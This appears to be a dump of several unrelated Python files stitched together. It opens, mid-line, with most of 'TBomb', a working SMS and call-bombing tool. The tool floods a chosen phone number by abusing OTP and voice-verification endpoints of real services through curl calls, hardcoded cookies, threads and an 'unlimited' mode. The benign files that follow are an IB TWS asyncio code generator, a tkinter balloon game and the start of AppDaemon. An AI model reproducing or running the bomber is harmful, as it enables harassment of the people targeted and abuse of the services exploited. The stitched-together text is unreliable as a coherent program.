TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"' + pn + '","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read()
except Exception:
return True
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
con = '{"country_code":"' + cc + '","phone_number":"' + pn + '"}'
os.popen('rm temp.xxx2 > /dev/null 2>&1')
os.system('curl -s -X POST -H "Host:api.cloud.altbalaji.com" -H "Connection:keep-alive" -H "Content-Length:' + str(len(con)) +
'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \'' + con + '\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2')
while not os.path.exists('temp.xxx2'):
time.sleep(0.1)
rd = hashlib.md5(open('temp.xxx2', 'rb').read()).hexdigest()
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
rd = os.popen('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email=' + cc + pn + '&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read().strip()
return rd.find('code:') != -1
elif lim == 16:
os.popen('curl -s -X POST -d \'method=SMS&countryCode=id&phoneNumber=' + cc + pn +
'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"')
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update TBomb')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tTo Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By sparkz-technology !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://raw.githubusercontent.com/sparkz-technology/TBomb/master/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfull !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
try:
noti = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
for cch in str(cc + pn):
if not cch.isdigit():
print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
if nm > 15:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 15
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
if cc == "91":
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
else:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print(
'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tTBomb Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By Sparkz-technology !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
|
asyncio_client_generator.py
|
from ib_tws_server.codegen.generator_utils import GeneratorUtils
from ib_tws_server.api_definition import *
from ib_tws_server.codegen.generator_utils import *
import inspect
def forward_method_parameters_dict_style(params: List[inspect.Parameter]) -> str:
return ",".join([ f"{v.name} = {v.name}" for v in params ])
def request_state_member_name(d: ApiDefinition):
return f"_req_state"
def subscription_member_name(d: ApiDefinition):
return f"_subscriptions"
def response_instance(d: ApiDefinition, m: Callable):
callback_type,is_wrapper = GeneratorUtils.callback_type(d, m)
if is_wrapper:
return f"{callback_type}({forward_method_parameters_dict_style(GeneratorUtils.data_class_members(d, [m], False))})"
else:
return GeneratorUtils.data_class_members(d, [m], False)[0].name
def streaming_instance(d: ApiDefinition, m: Callable):
callback_type,is_wrapper = GeneratorUtils.callback_type(d, m)
if is_wrapper:
return f"{callback_type}({forward_method_parameters_dict_style(GeneratorUtils.data_class_members(d, [m], True))})"
else:
return GeneratorUtils.data_class_members(d, [m], False)[0].name
def request_id(d: ApiDefinition, m: Callable):
if not d.uses_req_id:
return f"'{d.request_method.__name__}'"
else:
return GeneratorUtils.req_id_param_name(m)
def current_request_state(d: ApiDefinition, m: Callable):
return f"self.{request_state_member_name(d)}[{request_id(d, m)}]"
def bind_method(d: ApiDefinition, m: Callable, param_values: List[str]) -> str:
param_values[0] = f"self._client.{m.__name__}"
return f"functools.partial({','.join(param_values)})"
class AsyncioClientGenerator:
@staticmethod
def generate(filename):
def init_callback(d: ApiDefinition, m: Callable, cb: str):
if d.callback_methods is not None or d.done_method is not None:
return f"{current_request_state(d,m)}.{cb} = {cb}"
return ""
def init_request_id(d: ApiDefinition, u: Callable):
if d.uses_req_id:
return f"{GeneratorUtils.req_id_param_name(d.request_method)} = self.next_request_id()"
else:
return ""
def init_subscription(d: ApiDefinition):
if d.cancel_method is None:
raise RuntimeError(f"Request does not support cancellation {d.request_method.__name__}")
current_subscription = f"self.{subscription_member_name(d)}[{request_id(d, d.request_method)}]"
return f"{current_subscription}= SubscriptionGenerator(self.__{d.cancel_method.__name__}, {GeneratorUtils.req_id_param_name(d.request_method)})"
def async_request_method(d: ApiDefinition, is_subscription: bool):
method_name = GeneratorUtils.request_method_name(d, is_subscription)
original_sig = GeneratorUtils.signature(d.request_method)
signature = GeneratorUtils.request_signature(d, is_subscription)
param_values = [ p.name if p.name != d.subscription_flag_name else f"{d.subscription_flag_value if is_subscription else not d.subscription_flag_value}" for p in original_sig.parameters.values() ]
if is_subscription:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
{init_request_id(d, d.request_method)}
ret: SubscriptionGenerator = None
with self._lock:
ret = {init_subscription(d)}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
return ret"""
if d.callback_methods is not None or d.done_method is not None:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
loop = asyncio.get_running_loop()
future = loop.create_future()
def cb(res: {GeneratorUtils.request_return_type(d, is_subscription)}):
loop.call_soon_threadsafe(future.set_result, res)
{init_request_id(d, d.request_method)}
with self._lock:
{init_callback(d, d.request_method, 'cb')}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
res = (await future)
if isinstance(res, IbError):
raise res
return res"""
else:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
{init_request_id(d, d.request_method)}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
return None"""
def cancel_method(d: ApiDefinition):
return f"""
def __{GeneratorUtils.method_declaration(d.cancel_method)}:
{GeneratorUtils.doc_string(d.cancel_method)}
self.cancel_request({request_id(d,d.cancel_method)})
self._writer.queue.put({bind_method(d, d.cancel_method, list(GeneratorUtils.signature(d.cancel_method).parameters))})"""
with open(filename, "w") as f:
f.write(f"""
import asyncio
import functools
from collections import defaultdict
from ibapi.client import EClient
from ib_tws_server.asyncio.ib_writer import IBWriter
from ib_tws_server.asyncio.request_state import *
from ib_tws_server.asyncio.subscription_generator import SubscriptionGenerator
from ib_tws_server.error import *
from ib_tws_server.gen.client_responses import *
from ib_tws_server.gen.asyncio_wrapper import *
from ib_tws_server.ib_imports import *
from threading import Lock, Thread
import time
from typing import Callable, Dict, List, Tuple
class AsyncioClient():
_lock: Lock
_req_state: Dict[str, RequestState]
_subscriptions: Dict[int, SubscriptionGenerator]
_wrapper: AsyncioWrapper
_client: EClient
def __init__(self):
self._lock = Lock()
self._current_request_id = 0
self._req_state = defaultdict(RequestState)
self._subscriptions = defaultdict(SubscriptionGenerator)
self._wrapper = AsyncioWrapper(self._lock, self._req_state, self._subscriptions)
self._client = EClient(self._wrapper)
self._writer = IBWriter(self._client)
self._wrapper._writer = self._writer
def run(self):
self._writer.start()
self._client.run()
def next_request_id(self):
with self._lock:
self._current_request_id += 1
return self._current_request_id
def disconnect(self, clean=False):
self._wrapper._expecting_disconnect = clean
return self._client.disconnect()
def cancel_request(self, id: RequestId):
response_cb = None
with self._lock:
if id in self._req_state:
response_cb = self._req_state[id].cb
del self._req_state[id]
if id in self._subscriptions:
del self._subscriptions[id]
if response_cb is not None:
response_cb(None)
def start(self, host: str, port: int, client_id: int, connection_retry_interval: int):
while True:
try:
self._client.connect(host, port, client_id)
break
except ConnectionError as e:
if connection_retry_interval > 0:
time.sleep(connection_retry_interval)
else:
raise e
thread = Thread(target = self.run)
thread.start()
setattr(thread, "_thread", thread)
def active_request_count(self):
with self._lock:
return len(self._req_state)
def active_subscription_count(self):
with self._lock:
return len(self._subscriptions)
"""
)
for d in REQUEST_DEFINITIONS:
if d.request_method is not None:
if d.subscription_flag_name is not None:
f.write(async_request_method(d, False))
f.write(async_request_method(d, True))
else:
f.write(async_request_method(d, d.is_subscription))
if d.cancel_method is not None and (d.is_subscription or d.subscription_flag_name is not None):
f.write(cancel_method(d))
class AsyncioWrapperGenerator:
@staticmethod
def generate(filename):
def update_response(d: ApiDefinition, m:Callable):
if GeneratorUtils.response_is_list(d):
return f"""
if {request_id(d, m)} in self._req_state:
req_state = {current_request_state(d, m)}
if req_state.response is None:
req_state.response = []
req_state.response.append({response_instance(d, m)})"""
else:
return f"""
if {request_id(d, m)} in self._req_state:
req_state = {current_request_state(d, m)}
if req_state is not None:
req_state.response = {response_instance(d, m)}"""
def call_response_cb(d: ApiDefinition, m: Callable):
if d.callback_methods is not None:
return f"self.call_response_cb({request_id(d,m)})"
else:
return ""
def call_response_cb_if_done(d: ApiDefinition, m: Callable):
if d.has_done_flag:
return f"""
if (done):
{call_response_cb(d, m)}"""
elif not GeneratorUtils.response_is_list(d):
return f"""
{call_response_cb(d,m)}"""
else:
return ""
def callback_method(d: ApiDefinition, m: Callable):
if d.subscription_flag_name is not None:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
is_subscription: bool = False
with self._lock:
is_subscription = {request_id(d, m)} in self._subscriptions
{update_response(d, m)}
if is_subscription:
self.call_streaming_cb({request_id(d,m)}, {streaming_instance(d,m)})
return
{call_response_cb_if_done(d, m)}"""
elif not d.is_subscription:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
with self._lock:
{update_response(d, m)}
{call_response_cb_if_done(d, m)}"""
else:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
self.call_streaming_cb({request_id(d,m)}, {streaming_instance(d,m)})"""
def done_method(d: ApiDefinition):
return f"""
def {GeneratorUtils.method_declaration(d.done_method)}:
{GeneratorUtils.doc_string(d.done_method)}
{call_response_cb(d,d.done_method)}"""
with open(filename, "w") as f:
f.write(f"""
from ibapi.wrapper import EWrapper
from ib_tws_server.asyncio.ib_writer import IBWriter
from ib_tws_server.asyncio.request_state import *
from ib_tws_server.asyncio.subscription_generator import SubscriptionGenerator
from ib_tws_server.error import *
from ib_tws_server.gen.client_responses import *
from ib_tws_server.ib_imports import *
from threading import Lock
from typing import Dict, List
class AsyncioWrapper(EWrapper):
_lock: Lock
_req_state: Dict[str, RequestState]
_subscriptions: Dict[int, SubscriptionGenerator]
_expecting_disconnect: bool
_writer: IBWriter
def __init__(self, lock: Lock, req_state: Dict[str, RequestState], subscriptions: Dict[int, SubscriptionGenerator]):
self._lock = lock
self._req_state = req_state
self._subscriptions = subscriptions
EWrapper.__init__(self)
self._expecting_disconnect = False
def connectionClosed(self):
if self._expecting_disconnect:
# Wake up writer
self._writer.queue.put(lambda *a, **k: None)
else:
raise ConnectionError("Unexpected disconnect")
def call_response_cb(self, id: RequestId, res=None):
cb = None
with self._lock:
if not id in self._req_state:
return
s = self._req_state[id]
cb = s.cb
if res is None:
res = s.response
del self._req_state[id]
if cb is not None:
cb(res)
def error(self, reqId: int, errorCode: int, errorString: str):
cb = None
if reqId is not None:
with self._lock:
if reqId in self._req_state:
s = self._req_state[reqId]
cb = s.cb
del self._req_state[reqId]
if cb is not None:
cb(IbError(errorString, errorCode))
else:
super().error(reqId, errorCode, errorString)
def call_streaming_cb(self, id: RequestId, res: any):
cb = None
loop = None
with self._lock:
if id in self._subscriptions:
s = self._subscriptions[id]
cb = s.add_to_queue
loop = s._loop
if loop is not None:
loop.call_soon_threadsafe(cb, res)
""")
for d in REQUEST_DEFINITIONS:
if d.request_method is not None:
if d.callback_methods is not None:
for m in d.callback_methods:
f.write(callback_method(d, m))
if d.done_method is not None:
f.write(done_method(d))
|
main.py
|
"""
MIT License
Copyright (c) 2021 Jiusoft
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Author: Jothin kumar (https://jothin-kumar.github.io/)
"""
import tkinter as tk
from random import randint
from time import sleep
from threading import Thread
from playsound import playsound
root = tk.Tk()
root.wm_title('Balloon game - Jiusoft')
fullscreen = False
def enter_fullscreen():
global fullscreen
fullscreen = True
fullscreen_button['text'] = 'Exit fullscreen'
root.attributes('-fullscreen', True)
def exit_fullscreen():
global fullscreen
fullscreen = False
fullscreen_button['text'] = 'Enter fullscreeen'
root.attributes('-fullscreen', False)
def enter_or_exit_fullscreen():
if fullscreen:
exit_fullscreen()
elif not fullscreen:
enter_fullscreen()
fullscreen_button = tk.Button(master=root, text='', command=enter_or_exit_fullscreen)
fullscreen_button.pack(side=tk.RIGHT, anchor=tk.NE)
enter_fullscreen()
score_label = tk.Label(master=root, text='Score: 0')
def set_score(score: int):
score_label['text'] = f'Score: {score}'
score_label.pack(side=tk.TOP, fill=tk.X)
play_area = tk.Canvas(master=root, bg='snow', width=750, height=750)
play_area.pack(side=tk.TOP)
score = 0
def increase_score(evt):
global score
score += 1
set_score(score)
def play_pop():
playsound('Pop.mp3', True)
Thread(target=play_pop).start()
def create_rectangle_in_random_spot():
previous_rectangle = None
try:
for _ in range(20):
if previous_rectangle is not None:
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(1.5)
for _ in range(30):
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(1)
while True:
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(0.5)
except RuntimeError:
pass
Thread(target=create_rectangle_in_random_spot).start()
root.mainloop()
|
appdaemon.py
|
#!/usr/bin/python3
from pkg_resources import parse_version
import json
import sys
import importlib
import traceback
import configparser
import argparse
import logging
import os
import os.path
from websocket import create_connection
from logging.handlers import RotatingFileHandler
from queue import Queue
from sseclient import SSEClient
import threading
import appdaemon.conf as conf
import time
import datetime
import signal
import uuid
import astral
import pytz
import appdaemon.homeassistant as ha
import platform
import math
import appdaemon.appdash as appdash
import asyncio
import concurrent
from urllib.parse import urlparse
import yaml
import random
__version__ = "2.0.3"
# Windows does not have Daemonize package so disallow
if platform.system() != "Windows":
from daemonize import Daemonize
q = Queue(maxsize=0)
config = None
config_file_modified = 0
config_file = ""
was_dst = None
last_state = None
reading_messages = False
inits = {}
ws = None
def init_sun():
latitude = conf.latitude
longitude = conf.longitude
if -90 > latitude < 90:
raise ValueError("Latitude needs to be -90 .. 90")
if -180 > longitude < 180:
raise ValueError("Longitude needs to be -180 .. 180")
elevation = conf.elevation
conf.tz = pytz.timezone(conf.time_zone)
conf.location = astral.Location((
'', '', latitude, longitude, conf.tz.zone, elevation
))
def update_sun():
# now = datetime.datetime.now(conf.tz)
now = conf.tz.localize(ha.get_now())
mod = -1
while True:
try:
next_rising_dt = conf.location.sunrise(
now + datetime.timedelta(days=mod), local=False
)
if next_rising_dt > now:
break
except astral.AstralError:
pass
mod += 1
mod = -1
while True:
try:
next_setting_dt = conf.location.sunset(
now + datetime.timedelta(days=mod), local=False
)
if next_setting_dt > now:
break
except astral.AstralError:
pass
mod += 1
old_next_rising_dt = conf.sun.get("next_rising")
old_next_setting_dt = conf.sun.get("next_setting")
conf.sun["next_rising"] = next_rising_dt
conf.sun["next_setting"] = next_setting_dt
if old_next_rising_dt is not None and old_next_rising_dt != conf.sun["next_rising"]:
# dump_schedule()
process_sun("next_rising")
# dump_schedule()
if old_next_setting_dt is not None and old_next_setting_dt != conf.sun["next_setting"]:
# dump_schedule()
process_sun("next_setting")
# dump_schedule()
def is_dst():
return bool(time.localtime(ha.get_now_ts()).tm_isdst)
# noinspection PyUnusedLocal
def handle_sig(signum, frame):
global ws
if signum == signal.SIGUSR1:
dump_schedule()
dump_callbacks()
dump_objects()
dump_queue()
dump_sun()
